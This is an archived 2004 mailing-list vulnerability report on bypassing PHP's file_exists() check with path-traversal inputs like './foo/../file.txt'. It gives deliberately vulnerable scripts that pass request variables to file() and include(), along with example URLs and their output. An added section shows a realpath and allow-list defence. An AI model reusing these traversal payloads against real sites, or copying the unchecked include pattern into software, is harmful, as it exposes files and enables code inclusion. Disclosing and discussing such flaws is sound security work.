Full Disclosure mailing list archives
file_exists() bypassing , critical problem ?
From: "Nourredine Himeur" <lostnoobs () security-challenge com>
Date: Mon, 2 Feb 2004 11:12:28 +0100
Hi,

There is a security problem in the file_exists() function that allows unauthorized users to bypass the function.

For example, a user uses this function to check the existence of his file "my_file.php" in the "/test" directory and to display its source code. For this he uses a script like this one:

----- file_exists.php -----
<?php
if(file_exists($var)){ // $var is filled from the query string (register_globals)
    echo("File exist<br><br>");
    $source = file( $var );
    while ( list( $num_line, $line ) = each( $source ) ) {
        echo "<B>Line $num_line:</B> ".htmlspecialchars( $line ) . "<br>";
    }
}else{
    echo("File doesn't exist<br><br>");
    $source = file( $var ); // read attempted even though the check failed
    while ( list( $num_line, $line ) = each( $source ) ) {
        echo "<B>Line $num_line:</B> ".htmlspecialchars( $line ) . "<br>";
    }
}
?>
----- file_exists.php -----

He tests his script with the following address on his server:

http://[server]/test/file_exists.php?var=my_file.php

The file "my_file.php" contains the following text:

----- my_file.php -----
PHP is a widely-used
general-purpose scripting
language that is especially
suited for Web development
and can be embedded into HTML.
----- my_file.php -----

After launching his script, he obtains:

----- http://[server]/test/file_exists.php?var=my_file.php -----
File exist

Line 0: PHP is a widely-used
Line 1: general-purpose scripting
Line 2: language that is especially
Line 3: suited for Web development
Line 4: and can be embedded into HTML.
----- http://[server]/test/file_exists.php?var=my_file.php -----

Up to here everything seems to be normal. If he tests it with another file name, he obtains:

----- http://[server]/test/file_exists.php?var=another_file.php -----
File doesn't exist

Warning: file(test): failed to open stream: No such file or directory in /home/xxx/www/test/file_exists.php on line 11

Warning: Variable passed to each() is not an array or object in /home/xxx/www/test/file_exists.php on line 12
----- http://[server]/test/file_exists.php?var=another_file.php -----

It's normal too...

But if a user tests this script, for example, with the following link:

http://[server]/test/file_exists.php?var=anything/../my_file.php

he obtains:

----- http://[server]/test/file_exists.php?var=anything/../my_file.php -----
File doesn't exist

Line 0: PHP is a widely-used
Line 1: general-purpose scripting
Line 2: language that is especially
Line 3: suited for Web development
Line 4: and can be embedded into HTML.
----- http://[server]/test/file_exists.php?var=anything/../my_file.php -----

We can see that the file_exists() function returns that the file doesn't exist, but the source code has been displayed.

It's a very critical bug because a malicious user can use it to bypass the file_exists() protection on an include() script, for example.

°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°

Another, simpler example:

In the same directory:

test.php
-----------------------------------------------------------
<?
if(file_exists($page)){ // $page is filled from the query string (register_globals)
    echo("Sorry the local page is protected");
}else{
    include($page);
}
?>
-----------------------------------------------------------

file.txt
-----------------------------------------------------------
Hello Word
-----------------------------------------------------------

http://www.example.com/test.php?page=file.txt
Result: Sorry the local page is protected

http://www.example.com/test.php?page=./foo/../file.txt
Result: Hello Word

The function file_exists() is bypassed.

°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°

I want to know if you think that's a real vulnerability or not? (securityfocus says NO and doesn't want to publish it)

If you have any questions, don't hesitate to contact me.

Nourredine Himeur
lostnoobs () security-challenge com
www.security-challenge.com
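Added example, not part of the original post: one way to avoid the check/use mismatch shown in test.php is to canonicalise the requested name once with realpath(), confine it to a base directory, match it against an allow-list, and open that same canonical path. The helper name resolve_in_base(), the directory layout and the allow-list contents are assumptions made for this illustration; the sample files are constructed.

```php
<?php
// Added example: hypothetical helper; sample files are constructed in a temp dir.
declare(strict_types=1);

/**
 * Map a user-supplied name to a readable file inside $baseDir, or null.
 * The path is canonicalised once; the same canonical string is both
 * checked and opened, so check and use cannot disagree about "foo/../x".
 */
function resolve_in_base(string $baseDir, string $requested, array $allowed): ?string
{
    $base = realpath($baseDir);
    if ($base === false || strpos($requested, "\0") !== false) {
        return null;                       // bad base directory or embedded NUL byte
    }
    $real = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($real === false || !is_file($real)) {
        return null;                       // does not resolve to a regular file
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;                       // canonical path escapes the base directory
    }
    // Allow-list on the canonical relative name, instead of a file_exists() deny test.
    $relative = substr($real, strlen($prefix));
    return in_array($relative, $allowed, true) ? $real : null;
}

// Constructed sample layout: <tmp>/pages/{file.txt,config.php} and <tmp>/secret.txt.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'fe_demo_' . getmypid();
@mkdir($root . '/pages', 0700, true);
file_put_contents($root . '/pages/file.txt', "Hello World\n");
file_put_contents($root . '/pages/config.php', "<?php // not public\n");
file_put_contents($root . '/secret.txt', "outside the base\n");

$requests = ['file.txt', './foo/../file.txt', 'config.php', '../secret.txt', 'missing.txt'];
foreach ($requests as $req) {
    $path = resolve_in_base($root . '/pages', $req, ['file.txt']);
    // Content is read with file_get_contents(), never include(), so it is not executed.
    $shown = $path === null ? 'rejected' : trim(file_get_contents($path));
    printf("%-20s => %s\n", $req, $shown);
}
```

Whether the runtime resolves "./foo/../file.txt" or rejects it, the decision and the read are made on the same canonical path, so the request can only ever return an allow-listed file.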